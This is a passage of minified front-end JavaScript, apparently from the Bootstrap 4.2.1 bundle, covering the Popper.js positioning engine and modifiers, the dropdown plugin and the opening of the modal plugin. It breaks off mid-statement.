e=Nt(t),n=e.overflow,i=e.overflowX,o=e.overflowY;return/(auto|scroll|overlay)/.test(n+o+i)?t:Lt(kt(t))}var Pt=Ct&&!(!window.MSInputMethodContext||!document.documentMode),xt=Ct&&/MSIE 10/.test(navigator.userAgent);function Ht(t){return 11===t?Pt:10===t?xt:Pt||xt}function jt(t){if(!t)return document.documentElement;for(var e=Ht(10)?document.body:null,n=t.offsetParent||null;n===e&&t.nextElementSibling;)n=(t=t.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&"BODY"!==i&&"HTML"!==i?-1!==["TH","TD","TABLE"].indexOf(n.nodeName)&&"static"===Nt(n,"position")?jt(n):n:t?t.ownerDocument.documentElement:document.documentElement}function Rt(t){return null!==t.parentNode?Rt(t.parentNode):t}function Ft(t,e){if(!(t&&t.nodeType&&e&&e.nodeType))return document.documentElement;var n=t.compareDocumentPosition(e)&Node.DOCUMENT_POSITION_FOLLOWING,i=n?t:e,o=n?e:t,r=document.createRange();r.setStart(i,0),r.setEnd(o,0);var s,a,l=r.commonAncestorContainer;if(t!==l&&e!==l||i.contains(o))return"BODY"===(a=(s=l).nodeName)||"HTML"!==a&&jt(s.firstElementChild)!==s?jt(l):l;var c=Rt(t);return c.host?Ft(c.host,e):Ft(t,Rt(e).host)}function Mt(t){var e="top"===(1<arguments.length&&void 0!==arguments[1]?arguments[1]:"top")?"scrollTop":"scrollLeft",n=t.nodeName;if("BODY"!==n&&"HTML"!==n)return t[e];var i=t.ownerDocument.documentElement;return(t.ownerDocument.scrollingElement||i)[e]}function Wt(t,e){var n="x"===e?"Left":"Top",i="Left"===n?"Right":"Bottom";return parseFloat(t["border"+n+"Width"],10)+parseFloat(t["border"+i+"Width"],10)}function Ut(t,e,n,i){return Math.max(e["offset"+t],e["scroll"+t],n["client"+t],n["offset"+t],n["scroll"+t],Ht(10)?parseInt(n["offset"+t])+parseInt(i["margin"+("Height"===t?"Top":"Left")])+parseInt(i["margin"+("Height"===t?"Bottom":"Right")]):0)}function Bt(t){var e=t.body,n=t.documentElement,i=Ht(10)&&getComputedStyle(n);return{height:Ut("Height",e,n,i),width:Ut("Width",e,n,i)}}var qt=function(){function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}return function(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}}(),Kt=function(t,e,n){return e in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t},Qt=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t};function Yt(t){return Qt({},t,{right:t.left+t.width,bottom:t.top+t.height})}function Vt(t){var e={};try{if(Ht(10)){e=t.getBoundingClientRect();var n=Mt(t,"top"),i=Mt(t,"left");e.top+=n,e.left+=i,e.bottom+=n,e.right+=i}else e=t.getBoundingClientRect()}catch(t){}var o={left:e.left,top:e.top,width:e.right-e.left,height:e.bottom-e.top},r="HTML"===t.nodeName?Bt(t.ownerDocument):{},s=r.width||t.clientWidth||o.right-o.left,a=r.height||t.clientHeight||o.bottom-o.top,l=t.offsetWidth-s,c=t.offsetHeight-a;if(l||c){var h=Nt(t);l-=Wt(h,"x"),c-=Wt(h,"y"),o.width-=l,o.height-=c}return Yt(o)}function Xt(t,e){var n=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=Ht(10),o="HTML"===e.nodeName,r=Vt(t),s=Vt(e),a=Lt(t),l=Nt(e),c=parseFloat(l.borderTopWidth,10),h=parseFloat(l.borderLeftWidth,10);n&&o&&(s.top=Math.max(s.top,0),s.left=Math.max(s.left,0));var u=Yt({top:r.top-s.top-c,left:r.left-s.left-h,width:r.width,height:r.height});if(u.marginTop=0,u.marginLeft=0,!i&&o){var f=parseFloat(l.marginTop,10),d=parseFloat(l.marginLeft,10);u.top-=c-f,u.bottom-=c-f,u.left-=h-d,u.right-=h-d,u.marginTop=f,u.marginLeft=d}return(i&&!n?e.contains(a):e===a&&"BODY"!==a.nodeName)&&(u=function(t,e){var n=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=Mt(e,"top"),o=Mt(e,"left"),r=n?-1:1;return t.top+=i*r,t.bottom+=i*r,t.left+=o*r,t.right+=o*r,t}(u,e)),u}function zt(t){if(!t||!t.parentElement||Ht())return document.documentElement;for(var e=t.parentElement;e&&"none"===Nt(e,"transform");)e=e.parentElement;return e||document.documentElement}function Gt(t,e,n,i){var o=4<arguments.length&&void 0!==arguments[4]&&arguments[4],r={top:0,left:0},s=o?zt(t):Ft(t,e);if("viewport"===i)r=function(t){var e=1<arguments.length&&void 0!==arguments[1]&&arguments[1],n=t.ownerDocument.documentElement,i=Xt(t,n),o=Math.max(n.clientWidth,window.innerWidth||0),r=Math.max(n.clientHeight,window.innerHeight||0),s=e?0:Mt(n),a=e?0:Mt(n,"left");return Yt({top:s-i.top+i.marginTop,left:a-i.left+i.marginLeft,width:o,height:r})}(s,o);else{var a=void 0;"scrollParent"===i?"BODY"===(a=Lt(kt(e))).nodeName&&(a=t.ownerDocument.documentElement):a="window"===i?t.ownerDocument.documentElement:i;var l=Xt(a,s,o);if("HTML"!==a.nodeName||function t(e){var n=e.nodeName;return"BODY"!==n&&"HTML"!==n&&("fixed"===Nt(e,"position")||t(kt(e)))}(s))r=l;else{var c=Bt(t.ownerDocument),h=c.height,u=c.width;r.top+=l.top-l.marginTop,r.bottom=h+l.top,r.left+=l.left-l.marginLeft,r.right=u+l.left}}var f="number"==typeof(n=n||0);return r.left+=f?n:n.left||0,r.top+=f?n:n.top||0,r.right-=f?n:n.right||0,r.bottom-=f?n:n.bottom||0,r}function Jt(t,e,i,n,o){var r=5<arguments.length&&void 0!==arguments[5]?arguments[5]:0;if(-1===t.indexOf("auto"))return t;var s=Gt(i,n,r,o),a={top:{width:s.width,height:e.top-s.top},right:{width:s.right-e.right,height:s.height},bottom:{width:s.width,height:s.bottom-e.bottom},left:{width:e.left-s.left,height:s.height}},l=Object.keys(a).map(function(t){return Qt({key:t},a[t],{area:(e=a[t],e.width*e.height)});var e}).sort(function(t,e){return e.area-t.area}),c=l.filter(function(t){var e=t.width,n=t.height;return e>=i.clientWidth&&n>=i.clientHeight}),h=0<c.length?c[0].key:l[0].key,u=t.split("-")[1];return h+(u?"-"+u:"")}function Zt(t,e,n){var i=3<arguments.length&&void 0!==arguments[3]?arguments[3]:null;return Xt(n,i?zt(e):Ft(e,n),i)}function $t(t){var e=t.ownerDocument.defaultView.getComputedStyle(t),n=parseFloat(e.marginTop||0)+parseFloat(e.marginBottom||0),i=parseFloat(e.marginLeft||0)+parseFloat(e.marginRight||0);return{width:t.offsetWidth+i,height:t.offsetHeight+n}}function te(t){var e={left:"right",right:"left",bottom:"top",top:"bottom"};return t.replace(/left|right|bottom|top/g,function(t){return e[t]})}function ee(t,e,n){n=n.split("-")[0];var i=$t(t),o={width:i.width,height:i.height},r=-1!==["right","left"].indexOf(n),s=r?"top":"left",a=r?"left":"top",l=r?"height":"width",c=r?"width":"height";return o[s]=e[s]+e[l]/2-i[l]/2,o[a]=n===a?e[a]-i[c]:e[te(a)],o}function ne(t,e){return Array.prototype.find?t.find(e):t.filter(e)[0]}function ie(t,n,e){return(void 0===e?t:t.slice(0,function(t,e,n){if(Array.prototype.findIndex)return t.findIndex(function(t){return t[e]===n});var i=ne(t,function(t){return t[e]===n});return t.indexOf(i)}(t,"name",e))).forEach(function(t){t.function&&console.warn("`modifier.function` is deprecated, use `modifier.fn`!");var e=t.function||t.fn;t.enabled&&Ot(e)&&(n.offsets.popper=Yt(n.offsets.popper),n.offsets.reference=Yt(n.offsets.reference),n=e(n,t))}),n}function oe(t,n){return t.some(function(t){var e=t.name;return t.enabled&&e===n})}function re(t){for(var e=[!1,"ms","Webkit","Moz","O"],n=t.charAt(0).toUpperCase()+t.slice(1),i=0;i<e.length;i++){var o=e[i],r=o?""+o+n:t;if("undefined"!=typeof document.body.style[r])return r}return null}function se(t){var e=t.ownerDocument;return e?e.defaultView:window}function ae(t,e,n,i){n.updateBound=i,se(t).addEventListener("resize",n.updateBound,{passive:!0});var o=Lt(t);return function t(e,n,i,o){var r="BODY"===e.nodeName,s=r?e.ownerDocument.defaultView:e;s.addEventListener(n,i,{passive:!0}),r||t(Lt(s.parentNode),n,i,o),o.push(s)}(o,"scroll",n.updateBound,n.scrollParents),n.scrollElement=o,n.eventsEnabled=!0,n}function le(){var t,e;this.state.eventsEnabled&&(cancelAnimationFrame(this.scheduleUpdate),this.state=(t=this.reference,e=this.state,se(t).removeEventListener("resize",e.updateBound),e.scrollParents.forEach(function(t){t.removeEventListener("scroll",e.updateBound)}),e.updateBound=null,e.scrollParents=[],e.scrollElement=null,e.eventsEnabled=!1,e))}function ce(t){return""!==t&&!isNaN(parseFloat(t))&&isFinite(t)}function he(n,i){Object.keys(i).forEach(function(t){var e="";-1!==["width","height","top","right","bottom","left"].indexOf(t)&&ce(i[t])&&(e="px"),n.style[t]=i[t]+e})}var ue=Ct&&/Firefox/i.test(navigator.userAgent);function fe(t,e,n){var i=ne(t,function(t){return t.name===e}),o=!!i&&t.some(function(t){return t.name===n&&t.enabled&&t.order<i.order});if(!o){var r="`"+e+"`",s="`"+n+"`";console.warn(s+" modifier is required by "+r+" modifier in order to work, be sure to include it before "+r+"!")}return o}var de=["auto-start","auto","auto-end","top-start","top","top-end","right-start","right","right-end","bottom-end","bottom","bottom-start","left-end","left","left-start"],pe=de.slice(3);function me(t){var e=1<arguments.length&&void 0!==arguments[1]&&arguments[1],n=pe.indexOf(t),i=pe.slice(n+1).concat(pe.slice(0,n));return e?i.reverse():i}var ge="flip",_e="clockwise",ve="counterclockwise";function ye(t,o,r,e){var s=[0,0],a=-1!==["right","left"].indexOf(e),n=t.split(/(\+|\-)/).map(function(t){return t.trim()}),i=n.indexOf(ne(n,function(t){return-1!==t.search(/,|\s/)}));n[i]&&-1===n[i].indexOf(",")&&console.warn("Offsets separated by white space(s) are deprecated, use a comma (,) instead.");var l=/\s*,\s*|\s+/,c=-1!==i?[n.slice(0,i).concat([n[i].split(l)[0]]),[n[i].split(l)[1]].concat(n.slice(i+1))]:[n];return(c=c.map(function(t,e){var n=(1===e?!a:a)?"height":"width",i=!1;return t.reduce(function(t,e){return""===t[t.length-1]&&-1!==["+","-"].indexOf(e)?(t[t.length-1]=e,i=!0,t):i?(t[t.length-1]+=e,i=!1,t):t.concat(e)},[]).map(function(t){return function(t,e,n,i){var o=t.match(/((?:\-|\+)?\d*\.?\d*)(.*)/),r=+o[1],s=o[2];if(!r)return t;if(0!==s.indexOf("%"))return"vh"!==s&&"vw"!==s?r:("vh"===s?Math.max(document.documentElement.clientHeight,window.innerHeight||0):Math.max(document.documentElement.clientWidth,window.innerWidth||0))/100*r;var a=void 0;switch(s){case"%p":a=n;break;case"%":case"%r":default:a=i}return Yt(a)[e]/100*r}(t,n,o,r)})})).forEach(function(n,i){n.forEach(function(t,e){ce(t)&&(s[i]+=t*("-"===n[e-1]?-1:1))})}),s}var Ee={placement:"bottom",positionFixed:!1,eventsEnabled:!0,removeOnDestroy:!1,onCreate:function(){},onUpdate:function(){},modifiers:{shift:{order:100,enabled:!0,fn:function(t){var e=t.placement,n=e.split("-")[0],i=e.split("-")[1];if(i){var o=t.offsets,r=o.reference,s=o.popper,a=-1!==["bottom","top"].indexOf(n),l=a?"left":"top",c=a?"width":"height",h={start:Kt({},l,r[l]),end:Kt({},l,r[l]+r[c]-s[c])};t.offsets.popper=Qt({},s,h[i])}return t}},offset:{order:200,enabled:!0,fn:function(t,e){var n=e.offset,i=t.placement,o=t.offsets,r=o.popper,s=o.reference,a=i.split("-")[0],l=void 0;return l=ce(+n)?[+n,0]:ye(n,r,s,a),"left"===a?(r.top+=l[0],r.left-=l[1]):"right"===a?(r.top+=l[0],r.left+=l[1]):"top"===a?(r.left+=l[0],r.top-=l[1]):"bottom"===a&&(r.left+=l[0],r.top+=l[1]),t.popper=r,t},offset:0},preventOverflow:{order:300,enabled:!0,fn:function(t,i){var e=i.boundariesElement||jt(t.instance.popper);t.instance.reference===e&&(e=jt(e));var n=re("transform"),o=t.instance.popper.style,r=o.top,s=o.left,a=o[n];o.top="",o.left="",o[n]="";var l=Gt(t.instance.popper,t.instance.reference,i.padding,e,t.positionFixed);o.top=r,o.left=s,o[n]=a,i.boundaries=l;var c=i.priority,h=t.offsets.popper,u={primary:function(t){var e=h[t];return h[t]<l[t]&&!i.escapeWithReference&&(e=Math.max(h[t],l[t])),Kt({},t,e)},secondary:function(t){var e="right"===t?"left":"top",n=h[e];return h[t]>l[t]&&!i.escapeWithReference&&(n=Math.min(h[e],l[t]-("right"===t?h.width:h.height))),Kt({},e,n)}};return c.forEach(function(t){var e=-1!==["left","top"].indexOf(t)?"primary":"secondary";h=Qt({},h,u[e](t))}),t.offsets.popper=h,t},priority:["left","right","top","bottom"],padding:5,boundariesElement:"scrollParent"},keepTogether:{order:400,enabled:!0,fn:function(t){var e=t.offsets,n=e.popper,i=e.reference,o=t.placement.split("-")[0],r=Math.floor,s=-1!==["top","bottom"].indexOf(o),a=s?"right":"bottom",l=s?"left":"top",c=s?"width":"height";return n[a]<r(i[l])&&(t.offsets.popper[l]=r(i[l])-n[c]),n[l]>r(i[a])&&(t.offsets.popper[l]=r(i[a])),t}},arrow:{order:500,enabled:!0,fn:function(t,e){var n;if(!fe(t.instance.modifiers,"arrow","keepTogether"))return t;var i=e.element;if("string"==typeof i){if(!(i=t.instance.popper.querySelector(i)))return t}else if(!t.instance.popper.contains(i))return console.warn("WARNING: `arrow.element` must be child of its popper element!"),t;var o=t.placement.split("-")[0],r=t.offsets,s=r.popper,a=r.reference,l=-1!==["left","right"].indexOf(o),c=l?"height":"width",h=l?"Top":"Left",u=h.toLowerCase(),f=l?"left":"top",d=l?"bottom":"right",p=$t(i)[c];a[d]-p<s[u]&&(t.offsets.popper[u]-=s[u]-(a[d]-p)),a[u]+p>s[d]&&(t.offsets.popper[u]+=a[u]+p-s[d]),t.offsets.popper=Yt(t.offsets.popper);var m=a[u]+a[c]/2-p/2,g=Nt(t.instance.popper),_=parseFloat(g["margin"+h],10),v=parseFloat(g["border"+h+"Width"],10),y=m-t.offsets.popper[u]-_-v;return y=Math.max(Math.min(s[c]-p,y),0),t.arrowElement=i,t.offsets.arrow=(Kt(n={},u,Math.round(y)),Kt(n,f,""),n),t},element:"[x-arrow]"},flip:{order:600,enabled:!0,fn:function(p,m){if(oe(p.instance.modifiers,"inner"))return p;if(p.flipped&&p.placement===p.originalPlacement)return p;var g=Gt(p.instance.popper,p.instance.reference,m.padding,m.boundariesElement,p.positionFixed),_=p.placement.split("-")[0],v=te(_),y=p.placement.split("-")[1]||"",E=[];switch(m.behavior){case ge:E=[_,v];break;case _e:E=me(_);break;case ve:E=me(_,!0);break;default:E=m.behavior}return E.forEach(function(t,e){if(_!==t||E.length===e+1)return p;_=p.placement.split("-")[0],v=te(_);var n,i=p.offsets.popper,o=p.offsets.reference,r=Math.floor,s="left"===_&&r(i.right)>r(o.left)||"right"===_&&r(i.left)<r(o.right)||"top"===_&&r(i.bottom)>r(o.top)||"bottom"===_&&r(i.top)<r(o.bottom),a=r(i.left)<r(g.left),l=r(i.right)>r(g.right),c=r(i.top)<r(g.top),h=r(i.bottom)>r(g.bottom),u="left"===_&&a||"right"===_&&l||"top"===_&&c||"bottom"===_&&h,f=-1!==["top","bottom"].indexOf(_),d=!!m.flipVariations&&(f&&"start"===y&&a||f&&"end"===y&&l||!f&&"start"===y&&c||!f&&"end"===y&&h);(s||u||d)&&(p.flipped=!0,(s||u)&&(_=E[e+1]),d&&(y="end"===(n=y)?"start":"start"===n?"end":n),p.placement=_+(y?"-"+y:""),p.offsets.popper=Qt({},p.offsets.popper,ee(p.instance.popper,p.offsets.reference,p.placement)),p=ie(p.instance.modifiers,p,"flip"))}),p},behavior:"flip",padding:5,boundariesElement:"viewport"},inner:{order:700,enabled:!1,fn:function(t){var e=t.placement,n=e.split("-")[0],i=t.offsets,o=i.popper,r=i.reference,s=-1!==["left","right"].indexOf(n),a=-1===["top","left"].indexOf(n);return o[s?"left":"top"]=r[n]-(a?o[s?"width":"height"]:0),t.placement=te(e),t.offsets.popper=Yt(o),t}},hide:{order:800,enabled:!0,fn:function(t){if(!fe(t.instance.modifiers,"hide","preventOverflow"))return t;var e=t.offsets.reference,n=ne(t.instance.modifiers,function(t){return"preventOverflow"===t.name}).boundaries;if(e.bottom<n.top||e.left>n.right||e.top>n.bottom||e.right<n.left){if(!0===t.hide)return t;t.hide=!0,t.attributes["x-out-of-boundaries"]=""}else{if(!1===t.hide)return t;t.hide=!1,t.attributes["x-out-of-boundaries"]=!1}return t}},computeStyle:{order:850,enabled:!0,fn:function(t,e){var n=e.x,i=e.y,o=t.offsets.popper,r=ne(t.instance.modifiers,function(t){return"applyStyle"===t.name}).gpuAcceleration;void 0!==r&&console.warn("WARNING: `gpuAcceleration` option moved to `computeStyle` modifier and will not be supported in future versions of Popper.js!");var s,a,l,c,h,u,f,d,p,m,g,_,v=void 0!==r?r:e.gpuAcceleration,y=jt(t.instance.popper),E=Vt(y),b={position:o.position},w=(s=t,a=window.devicePixelRatio<2||!ue,l=s.offsets,c=l.popper,h=l.reference,u=-1!==["left","right"].indexOf(s.placement),f=-1!==s.placement.indexOf("-"),d=h.width%2==c.width%2,p=h.width%2==1&&c.width%2==1,m=function(t){return t},g=a?u||f||d?Math.round:Math.floor:m,_=a?Math.round:m,{left:g(p&&!f&&a?c.left-1:c.left),top:_(c.top),bottom:_(c.bottom),right:g(c.right)}),T="bottom"===n?"top":"bottom",C="right"===i?"left":"right",S=re("transform"),D=void 0,I=void 0;if(I="bottom"===T?"HTML"===y.nodeName?-y.clientHeight+w.bottom:-E.height+w.bottom:w.top,D="right"===C?"HTML"===y.nodeName?-y.clientWidth+w.right:-E.width+w.right:w.left,v&&S)b[S]="translate3d("+D+"px, "+I+"px, 0)",b[T]=0,b[C]=0,b.willChange="transform";else{var A="bottom"===T?-1:1,O="right"===C?-1:1;b[T]=I*A,b[C]=D*O,b.willChange=T+", "+C}var N={"x-placement":t.placement};return t.attributes=Qt({},N,t.attributes),t.styles=Qt({},b,t.styles),t.arrowStyles=Qt({},t.offsets.arrow,t.arrowStyles),t},gpuAcceleration:!0,x:"bottom",y:"right"},applyStyle:{order:900,enabled:!0,fn:function(t){var e,n;return he(t.instance.popper,t.styles),e=t.instance.popper,n=t.attributes,Object.keys(n).forEach(function(t){!1!==n[t]?e.setAttribute(t,n[t]):e.removeAttribute(t)}),t.arrowElement&&Object.keys(t.arrowStyles).length&&he(t.arrowElement,t.arrowStyles),t},onLoad:function(t,e,n,i,o){var r=Zt(o,e,t,n.positionFixed),s=Jt(n.placement,r,e,t,n.modifiers.flip.boundariesElement,n.modifiers.flip.padding);return e.setAttribute("x-placement",s),he(e,{position:n.positionFixed?"fixed":"absolute"}),n},gpuAcceleration:void 0}}},be=function(){function r(t,e){var n=this,i=2<arguments.length&&void 0!==arguments[2]?arguments[2]:{};!function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}(this,r),this.scheduleUpdate=function(){return requestAnimationFrame(n.update)},this.update=At(this.update.bind(this)),this.options=Qt({},r.Defaults,i),this.state={isDestroyed:!1,isCreated:!1,scrollParents:[]},this.reference=t&&t.jquery?t[0]:t,this.popper=e&&e.jquery?e[0]:e,this.options.modifiers={},Object.keys(Qt({},r.Defaults.modifiers,i.modifiers)).forEach(function(t){n.options.modifiers[t]=Qt({},r.Defaults.modifiers[t]||{},i.modifiers?i.modifiers[t]:{})}),this.modifiers=Object.keys(this.options.modifiers).map(function(t){return Qt({name:t},n.options.modifiers[t])}).sort(function(t,e){return t.order-e.order}),this.modifiers.forEach(function(t){t.enabled&&Ot(t.onLoad)&&t.onLoad(n.reference,n.popper,n.options,t,n.state)}),this.update();var o=this.options.eventsEnabled;o&&this.enableEventListeners(),this.state.eventsEnabled=o}return qt(r,[{key:"update",value:function(){return function(){if(!this.state.isDestroyed){var t={instance:this,styles:{},arrowStyles:{},attributes:{},flipped:!1,offsets:{}};t.offsets.reference=Zt(this.state,this.popper,this.reference,this.options.positionFixed),t.placement=Jt(this.options.placement,t.offsets.reference,this.popper,this.reference,this.options.modifiers.flip.boundariesElement,this.options.modifiers.flip.padding),t.originalPlacement=t.placement,t.positionFixed=this.options.positionFixed,t.offsets.popper=ee(this.popper,t.offsets.reference,t.placement),t.offsets.popper.position=this.options.positionFixed?"fixed":"absolute",t=ie(this.modifiers,t),this.state.isCreated?this.options.onUpdate(t):(this.state.isCreated=!0,this.options.onCreate(t))}}.call(this)}},{key:"destroy",value:function(){return function(){return this.state.isDestroyed=!0,oe(this.modifiers,"applyStyle")&&(this.popper.removeAttribute("x-placement"),this.popper.style.position="",this.popper.style.top="",this.popper.style.left="",this.popper.style.right="",this.popper.style.bottom="",this.popper.style.willChange="",this.popper.style[re("transform")]=""),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}.call(this)}},{key:"enableEventListeners",value:function(){return function(){this.state.eventsEnabled||(this.state=ae(this.reference,this.options,this.state,this.scheduleUpdate))}.call(this)}},{key:"disableEventListeners",value:function(){return le.call(this)}}]),r}();be.Utils=("undefined"!=typeof window?window:global).PopperUtils,be.placements=de,be.Defaults=Ee;var we="dropdown",Te="bs.dropdown",Ce="."+Te,Se=".data-api",De=p.fn[we],Ie=new RegExp("38|40|27"),Ae={HIDE:"hide"+Ce,HIDDEN:"hidden"+Ce,SHOW:"show"+Ce,SHOWN:"shown"+Ce,CLICK:"click"+Ce,CLICK_DATA_API:"click"+Ce+Se,KEYDOWN_DATA_API:"keydown"+Ce+Se,KEYUP_DATA_API:"keyup"+Ce+Se},Oe="disabled",Ne="show",ke="dropup",Le="dropright",Pe="dropleft",xe="dropdown-menu-right",He="position-static",je='[data-toggle="dropdown"]',Re=".dropdown form",Fe=".dropdown-menu",Me=".navbar-nav",We=".dropdown-menu .dropdown-item:not(.disabled):not(:disabled)",Ue="top-start",Be="top-end",qe="bottom-start",Ke="bottom-end",Qe="right-start",Ye="left-start",Ve={offset:0,flip:!0,boundary:"scrollParent",reference:"toggle",display:"dynamic"},Xe={offset:"(number|string|function)",flip:"boolean",boundary:"(string|element)",reference:"(string|element)",display:"string"},ze=function(){function c(t,e){this._element=t,this._popper=null,this._config=this._getConfig(e),this._menu=this._getMenuElement(),this._inNavbar=this._detectNavbar(),this._addEventListeners()}var t=c.prototype;return t.toggle=function(){if(!this._element.disabled&&!p(this._element).hasClass(Oe)){var t=c._getParentFromElement(this._element),e=p(this._menu).hasClass(Ne);if(c._clearMenus(),!e){var n={relatedTarget:this._element},i=p.Event(Ae.SHOW,n);if(p(t).trigger(i),!i.isDefaultPrevented()){if(!this._inNavbar){if("undefined"==typeof be)throw new TypeError("Bootstrap's dropdowns require Popper.js (https://popper.js.org/)");var o=this._element;"parent"===this._config.reference?o=t:m.isElement(this._config.reference)&&(o=this._config.reference,"undefined"!=typeof this._config.reference.jquery&&(o=this._config.reference[0])),"scrollParent"!==this._config.boundary&&p(t).addClass(He),this._popper=new be(o,this._menu,this._getPopperConfig())}"ontouchstart"in document.documentElement&&0===p(t).closest(Me).length&&p(document.body).children().on("mouseover",null,p.noop),this._element.focus(),this._element.setAttribute("aria-expanded",!0),p(this._menu).toggleClass(Ne),p(t).toggleClass(Ne).trigger(p.Event(Ae.SHOWN,n))}}}},t.show=function(){if(!(this._element.disabled||p(this._element).hasClass(Oe)||p(this._menu).hasClass(Ne))){var t={relatedTarget:this._element},e=p.Event(Ae.SHOW,t),n=c._getParentFromElement(this._element);p(n).trigger(e),e.isDefaultPrevented()||(p(this._menu).toggleClass(Ne),p(n).toggleClass(Ne).trigger(p.Event(Ae.SHOWN,t)))}},t.hide=function(){if(!this._element.disabled&&!p(this._element).hasClass(Oe)&&p(this._menu).hasClass(Ne)){var t={relatedTarget:this._element},e=p.Event(Ae.HIDE,t),n=c._getParentFromElement(this._element);p(n).trigger(e),e.isDefaultPrevented()||(p(this._menu).toggleClass(Ne),p(n).toggleClass(Ne).trigger(p.Event(Ae.HIDDEN,t)))}},t.dispose=function(){p.removeData(this._element,Te),p(this._element).off(Ce),this._element=null,(this._menu=null)!==this._popper&&(this._popper.destroy(),this._popper=null)},t.update=function(){this._inNavbar=this._detectNavbar(),null!==this._popper&&this._popper.scheduleUpdate()},t._addEventListeners=function(){var e=this;p(this._element).on(Ae.CLICK,function(t){t.preventDefault(),t.stopPropagation(),e.toggle()})},t._getConfig=function(t){return t=l({},this.constructor.Default,p(this._element).data(),t),m.typeCheckConfig(we,t,this.constructor.DefaultType),t},t._getMenuElement=function(){if(!this._menu){var t=c._getParentFromElement(this._element);t&&(this._menu=t.querySelector(Fe))}return this._menu},t._getPlacement=function(){var t=p(this._element.parentNode),e=qe;return t.hasClass(ke)?(e=Ue,p(this._menu).hasClass(xe)&&(e=Be)):t.hasClass(Le)?e=Qe:t.hasClass(Pe)?e=Ye:p(this._menu).hasClass(xe)&&(e=Ke),e},t._detectNavbar=function(){return 0<p(this._element).closest(".navbar").length},t._getPopperConfig=function(){var e=this,t={};"function"==typeof this._config.offset?t.fn=function(t){return t.offsets=l({},t.offsets,e._config.offset(t.offsets)||{}),t}:t.offset=this._config.offset;var n={placement:this._getPlacement(),modifiers:{offset:t,flip:{enabled:this._config.flip},preventOverflow:{boundariesElement:this._config.boundary}}};return"static"===this._config.display&&(n.modifiers.applyStyle={enabled:!1}),n},c._jQueryInterface=function(e){return this.each(function(){var t=p(this).data(Te);if(t||(t=new c(this,"object"==typeof e?e:null),p(this).data(Te,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},c._clearMenus=function(t){if(!t||3!==t.which&&("keyup"!==t.type||9===t.which))for(var e=[].slice.call(document.querySelectorAll(je)),n=0,i=e.length;n<i;n++){var o=c._getParentFromElement(e[n]),r=p(e[n]).data(Te),s={relatedTarget:e[n]};if(t&&"click"===t.type&&(s.clickEvent=t),r){var a=r._menu;if(p(o).hasClass(Ne)&&!(t&&("click"===t.type&&/input|textarea/i.test(t.target.tagName)||"keyup"===t.type&&9===t.which)&&p.contains(o,t.target))){var l=p.Event(Ae.HIDE,s);p(o).trigger(l),l.isDefaultPrevented()||("ontouchstart"in document.documentElement&&p(document.body).children().off("mouseover",null,p.noop),e[n].setAttribute("aria-expanded","false"),p(a).removeClass(Ne),p(o).removeClass(Ne).trigger(p.Event(Ae.HIDDEN,s)))}}}},c._getParentFromElement=function(t){var e,n=m.getSelectorFromElement(t);return n&&(e=document.querySelector(n)),e||t.parentNode},c._dataApiKeydownHandler=function(t){if((/input|textarea/i.test(t.target.tagName)?!(32===t.which||27!==t.which&&(40!==t.which&&38!==t.which||p(t.target).closest(Fe).length)):Ie.test(t.which))&&(t.preventDefault(),t.stopPropagation(),!this.disabled&&!p(this).hasClass(Oe))){var e=c._getParentFromElement(this),n=p(e).hasClass(Ne);if(n&&(!n||27!==t.which&&32!==t.which)){var i=[].slice.call(e.querySelectorAll(We));if(0!==i.length){var o=i.indexOf(t.target);38===t.which&&0<o&&o--,40===t.which&&o<i.length-1&&o++,o<0&&(o=0),i[o].focus()}}else{if(27===t.which){var r=e.querySelector(je);p(r).trigger("focus")}p(this).trigger("click")}}},s(c,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return Ve}},{key:"DefaultType",get:function(){return Xe}}]),c}();p(document).on(Ae.KEYDOWN_DATA_API,je,ze._dataApiKeydownHandler).on(Ae.KEYDOWN_DATA_API,Fe,ze._dataApiKeydownHandler).on(Ae.CLICK_DATA_API+" "+Ae.KEYUP_DATA_API,ze._clearMenus).on(Ae.CLICK_DATA_API,je,function(t){t.preventDefault(),t.stopPropagation(),ze._jQueryInterface.call(p(this),"toggle")}).on(Ae.CLICK_DATA_API,Re,function(t){t.stopPropagation()}),p.fn[we]=ze._jQueryInterface,p.fn[we].Constructor=ze,p.fn[we].noConflict=function(){return p.fn[we]=De,ze._jQueryInterface};var Ge="modal",Je="bs.modal",Ze="."+Je,$e=p.fn[Ge],tn={backdrop:!0,keyboard:!0,focus:!0,show:!0},en={backdrop:"(boolean|string)",keyboard:"boolean",focus:"boolean",show:"boolean"},nn={HIDE:"hide"+Ze,HIDDEN:"hidden"+Ze,SHOW:"show"+Ze,SHOWN:"shown"+Ze,FOCUSIN:"focusin"+Ze,RESIZE:"resize"+Ze,CLICK_DISMISS:"click.dismiss"+Ze,KEYDOWN_DISMISS:"keydown.dismiss"+Ze,MOUSEUP_DISMISS:"mouseup.dismiss"+Ze,MOUSEDOWN_DISMISS:"mousedown.dismiss"+Ze,CLICK_DATA_API:"click"+Ze+".data-api"},on="modal-scrollbar-measure",rn="modal-backdrop",sn="modal-open",an="fade",ln="show",cn=".modal-dialog",hn='[data-toggle="modal"]',un='[data-dismiss="modal"]',fn=".fixed-top, .fixed-bottom, .is-fixed, .sticky-top",dn=".sticky-top",pn=function(){function o(t,e){this._config=this._getConfig(e),this._element=t,this._dialog=t.querySelector(cn),this._backdrop=null,this._isShown=!1,this._isBodyOverflowing=!1,this._ignoreBackdropClick=!1,this._isTransitioning=!1,this._scrollbarWidth=0}var t=o.prototype;return t.toggle=function(t){return this._isShown?this.hide():this.show(t)},t.show=function(t){var e=this;if(!this._isShown&&!this._isTransitioning){p(this._element).hasClass(an)&&(this._isTransitioning=!0);var 